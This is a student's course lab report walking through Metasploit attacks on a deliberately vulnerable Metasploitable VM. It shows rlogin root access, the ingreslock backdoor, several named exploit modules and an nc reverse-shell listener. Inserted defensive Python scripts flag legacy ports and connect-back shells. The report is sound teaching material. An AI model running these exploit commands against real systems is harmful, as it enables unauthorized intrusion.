
Assignment 4

CSI 4139 – Design of Secure Computer Systems -- Fundamentals of Cybersecurity

Fall 2023

Université d'Ottawa

Professor: Guy-Vincent Jourdan

Student: Taha ben amor, 30017275

Report due date: 2023-11-2


Labtainers Metasploit Lab Documentation

Introduction:

This document details the process and findings of the Labtainers Metasploit lab exercise,
aimed at understanding penetration testing techniques using the Metasploit framework. The
lab environment is set up using a Kali Linux system as the attacker and a Metasploitable
system as the victim. Each section includes detailed steps, screenshots, and an explanation of
the commands used.

Step 1: Verify Connectivity between Attacker and Victim

Objective: To establish a network connection between the attacker (Kali Linux) and the
victim (Metasploitable).

Steps:

1. From the attacker's terminal, I executed the ping 192.168.1.2 command to
check for connectivity.
2. The continuous replies from the victim's IP address confirmed that the network
was reachable.

Reasoning: Ping is a network utility that checks the reachability of a host on an Internet
Protocol (IP) network and measures the round-trip time for messages sent from the
originating host to a destination computer.

Step 2: Get a List of Vulnerable Services on the Victim

Objective: To identify open ports and potentially vulnerable services running on the
victim's system.

Steps:

1. I used the nmap -p- 192.168.1.2 command to perform a comprehensive port
scan.
2. The output listed all open ports and services, which would be analyzed for
vulnerabilities.

Reasoning: Nmap ("Network Mapper") is a free and open-source utility for network
discovery and security auditing. Scanning all ports provides a complete view of the
potential attack surface.
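As an added, defender-side example (not part of the lab or of this report), the script below parses nmap's greppable (-oG) output and flags the open ports that the later steps of this report treat as exposed legacy services. The scan text, the service labels and the version strings are constructed for the example; nothing here is output from the lab, and the port-to-service map simply mirrors the steps that follow.

```python
"""Triage an nmap greppable (-oG) scan for the legacy services this report
exploits in later steps. Added defensive example; the scan text below is
constructed for illustration and is not output from the lab."""

# Ports the report's Steps 3-10 cover, labelled as the report names them.
LEGACY_SERVICES = {
    21: "vsftpd 2.3.4 (backdoored build)",
    80: "HTTP / PHP CGI",
    139: "Samba",
    513: "rlogin",
    1524: "ingreslock",
    3632: "distccd",
    5432: "PostgreSQL",
    6667: "Unreal IRCd",
}

# Constructed sample of `nmap -p- -sV -oG - 192.168.1.2` output (not a real scan).
SAMPLE_SCAN = """\
# Nmap scan initiated (constructed sample)
Host: 192.168.1.2 ()\tStatus: Up
Host: 192.168.1.2 ()\tPorts: 21/open/tcp//ftp//vsftpd 2.3.4/, 22/open/tcp//ssh//OpenSSH 4.7p1/, 80/open/tcp//http//Apache httpd 2.2.8/, 139/open/tcp//netbios-ssn//Samba smbd/, 513/open/tcp//login///, 1524/open/tcp//bindshell///, 3632/open/tcp//distccd//distccd v1/, 5432/open/tcp//postgresql//PostgreSQL DB/, 6667/open/tcp//irc//UnrealIRCd/\tIgnored State: closed (65526)
# Nmap done (constructed sample)
"""


def parse_greppable(text):
    """Return {host: [(port, state, proto, service, version), ...]}.

    Each -oG port entry has seven '/'-separated fields:
    port/state/protocol/owner/service/rpcinfo/version.
    """
    results = {}
    for line in text.splitlines():
        if not line.startswith("Host:") or "Ports:" not in line:
            continue
        host = line.split()[1]
        ports_field = line.split("Ports:", 1)[1].split("\t", 1)[0]
        entries = results.setdefault(host, [])
        for item in ports_field.split(","):
            fields = item.strip().split("/")
            if len(fields) < 7:
                continue
            port, state, proto, _owner, service, _rpc, version = fields[:7]
            entries.append((int(port), state, proto, service, version))
    return results


def flag_legacy_services(scan):
    """Return sorted [(host, port, label, version)] for open TCP ports in LEGACY_SERVICES."""
    findings = []
    for host, entries in scan.items():
        for port, state, proto, _service, version in entries:
            if state == "open" and proto == "tcp" and port in LEGACY_SERVICES:
                findings.append((host, port, LEGACY_SERVICES[port], version))
    return sorted(findings)


if __name__ == "__main__":
    for host, port, label, version in flag_legacy_services(parse_greppable(SAMPLE_SCAN)):
        print(f"{host}:{port:<5} {label:<32} {version or '-'}")
```

On a real scan, feed the script the file written by -oG instead of SAMPLE_SCAN; the point of the greppable format is exactly this kind of one-line-per-host triage, and the eight hits on the constructed host are the exposure list that the rest of this report works through.
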

Step 3: Vulnerably Configured rlogin Service (port 513)

Objective: To demonstrate remote access to the victim's system via a misconfigured
rlogin service.

Steps:

1. I initiated a remote login session using rlogin -l root 192.168.1.2.
2. After gaining access, I displayed the contents of a sensitive file with cat
/root/filetoview.txt.

Reasoning: The rlogin command allows a user to log in on another Unix system via
the network, and viewing a root-owned file demonstrates the level of access gained.

Step 4: Vulnerable ingreslock Service (port 1524)

Objective: To exploit the ingreslock service to gain unauthorized root access to the
system.

Steps:

1. A connection was made to the service using telnet 192.168.1.2 1524.
2. I then displayed the root file to confirm the privilege level of the session.

Reasoning: The ingreslock service is known to have vulnerabilities that can be
exploited to gain elevated privileges. Telnet is used to interact with this service.

Step 5: Vulnerable distccd Service (port 3632)

Objective: To exploit the distccd service vulnerability to execute arbitrary commands
on the victim.

Steps:

1. Launched Metasploit with sudo msfconsole.
2. Located the distccd exploit using search distccd.
3. Selected the exploit with use exploit/unix/misc/distcc_exec.
4. Set the RHOST to the victim's IP with set RHOST 192.168.1.2.
5. Executed the exploit with exploit and verified by displaying the root file.

Reasoning: The distccd service, when misconfigured, allows execution of arbitrary
commands. This step demonstrates how an attacker could exploit such a
vulnerability.

Step 6: Vulnerable IRC Daemon (port 6667)

Objective: To exploit the Unreal IRCd service, which is known to have a backdoor
vulnerability.

Steps:

1. Accessed the Metasploit console and searched for the Unreal IRCd exploit
using search unreal_ircd.
2. Selected the exploit with use exploit/unix/irc/unreal_ircd_3281_backdoor.
3. Set the RHOST to the victim's IP with set RHOST 192.168.1.2.
4. Executed the exploit with exploit and demonstrated access by displaying the
root file.

Reasoning: Unreal IRCd had a known backdoor in certain versions, which could be
exploited to gain unauthorized access to the system.

Step 7: Vulnerable VSFtpd Service (port 21)

Objective: To demonstrate the exploitation of a backdoor in the VSFtpd service.

Steps:

1. In the Metasploit console, located the vsftpd exploit with search vsftpd_234.
2. Chose the exploit with use exploit/unix/ftp/vsftpd_234_backdoor.
3. Configured the RHOST as before and executed the exploit.
4. Verified success by displaying the root file.

Reasoning: The vsftpd 2.3.4 version contains a malicious backdoor that was
introduced by an unknown attacker, which can be exploited to gain shell access to
the system.

Step 8: Vulnerable Samba Service (port 139)

Objective: To exploit the Samba service for unauthorized code execution.

Steps:

1. Found the Samba exploit using search usermap_script.
2. Utilized the exploit with use exploit/multi/samba/usermap_script.
3. Set up the RHOST and executed the exploit.
4. Displayed the root file to confirm the exploit's success.

Reasoning: The usermap script in Samba versions prior to 3.0.20 allows attackers to
execute programs as an administrator, making it a critical vulnerability.

Step 9: Vulnerable HTTP (php) Service (port 80)

Objective: To take advantage of a PHP CGI argument injection vulnerability.

Steps:

1. Searched for the relevant PHP CGI exploit in Metasploit with search php_cgi.
2. Selected the appropriate exploit with use exploit/multi/http/php_cgi_arg_injection.
3. Configured the necessary options, including RHOST, and ran the exploit.
4. Upon successful exploitation, dropped to a shell and displayed the root file.

Reasoning: PHP CGI argument injection can be used to execute arbitrary code on the
web server, potentially allowing for full system control.

Step 10: Vulnerable Postgres Service (port 5432)

Objective: To exploit a vulnerability in the Postgres service which allows for arbitrary
code execution.

Steps:

1. Located a Postgres exploit with search postgres_payload.
2. Executed use exploit/linux/postgres/postgres_payload.
3. Set the RHOST to target the victim's IP and ran the exploit.
4. Proved control by displaying the root file from the shell.

I had prepared everything necessary to exploit the target, and the chosen payload
required a listener on port 4444. Typically, this would be set up using a command like
nc -lvnp 4444 to listen for incoming connections. However, I faced a constraint as I
did not have access to another attacker terminal to establish this listener. Despite
successfully executing the exploit, this lack of a listener resulted in no session being
created. This outcome highlights the importance of the listener in reverse shell
payloads, where the exploited system attempts to connect back to the attacker's
system. Without this listener in place, even a successful exploit cannot establish the
necessary back-connection for a session.
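From the defender's side, the same dependency on a connect-back is what egress filtering and outbound-connection monitoring rely on: if the victim cannot reach the listener, no session forms, exactly as observed above. The script below is an added example, not part of this report or of the lab. It reads a constructed ss -tnp snapshot from a host like the victim and flags established connections that the host itself initiated from a shell-like process, or to a port outside an assumed egress allow-list. The snapshot, the listening-port set and the allow-list are all assumptions made for the example.

```python
"""Flag connect-back ("reverse shell") sessions in an `ss -tnp` snapshot.
Added defensive example, not part of the report or the lab; the snapshot,
the listening-port set and the egress allow-list are constructed/assumed."""
import re

# Constructed `ss -tnp` snapshot from a host like the lab victim (not real data).
SAMPLE_SS = """\
State  Recv-Q Send-Q Local Address:Port   Peer Address:Port    Process
ESTAB  0      0      192.168.1.2:5432     192.168.1.50:41022   users:(("postgres",pid=4102,fd=9))
ESTAB  0      0      192.168.1.2:22       192.168.1.50:52110   users:(("sshd",pid=3301,fd=4))
ESTAB  0      0      192.168.1.2:40212    192.168.1.1:4444     users:(("sh",pid=4187,fd=3))
ESTAB  0      0      192.168.1.2:40213    192.168.1.1:80       users:(("curl",pid=4190,fd=3))
"""

# Ports this host serves (assumed; on a real host take them from `ss -tln`).
LISTENING_PORTS = {21, 22, 80, 139, 513, 1524, 3632, 5432, 6667}
# Remote ports the host is expected to initiate connections to (assumed policy).
EXPECTED_EGRESS_PORTS = {53, 80, 443}
# Processes that should never own an outbound socket on a server.
SHELL_LIKE = {"sh", "bash", "dash", "nc", "ncat", "perl", "python", "python3"}

LINE_RE = re.compile(
    r"^(?P<state>\S+)\s+\d+\s+\d+\s+"
    r"(?P<laddr>\S+):(?P<lport>\d+)\s+(?P<raddr>\S+):(?P<rport>\d+)\s+"
    r'users:\(\("(?P<proc>[^"]+)",pid=(?P<pid>\d+)'
)


def parse_ss(text):
    """Parse `ss -tnp` lines into dicts; the header and unparseable lines are skipped."""
    conns = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        d = m.groupdict()
        for key in ("lport", "rport", "pid"):
            d[key] = int(d[key])
        conns.append(d)
    return conns


def flag_connect_backs(conns, listening_ports):
    """Return [(pid, proc, "raddr:rport", [reasons])] for host-initiated sessions
    that a shell-like process owns or that leave on a non-allow-listed port."""
    alerts = []
    for c in conns:
        # A local port we listen on means the peer connected to us: inbound, not a connect-back.
        if c["state"] != "ESTAB" or c["lport"] in listening_ports:
            continue
        reasons = []
        if c["proc"] in SHELL_LIKE:
            reasons.append("shell-like process owns an outbound socket")
        if c["rport"] not in EXPECTED_EGRESS_PORTS:
            reasons.append(f"egress to non-allow-listed port {c['rport']}")
        if reasons:
            alerts.append((c["pid"], c["proc"], f"{c['raddr']}:{c['rport']}", reasons))
    return alerts


if __name__ == "__main__":
    for pid, proc, peer, reasons in flag_connect_backs(parse_ss(SAMPLE_SS), LISTENING_PORTS):
        print(f"pid {pid} ({proc}) -> {peer}: " + "; ".join(reasons))
```

On a real host the listening-port set should come from the host's own ss -tln output rather than a hard-coded list, and the allow-list is the same policy an egress firewall rule would enforce. The one alert in the constructed snapshot (a shell owning a socket to port 4444) is the shape a successful reverse payload leaves behind once its listener is up; with egress limited to the allow-listed ports, that connection is refused at the boundary and the exploit stays session-less, as it did here.
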

References:

https://nps.edu/web/c3o/labtainers

https://www.offsec.com/metasploit-unleashed/

https://owasp.org/www-project-web-security-testing-guide/
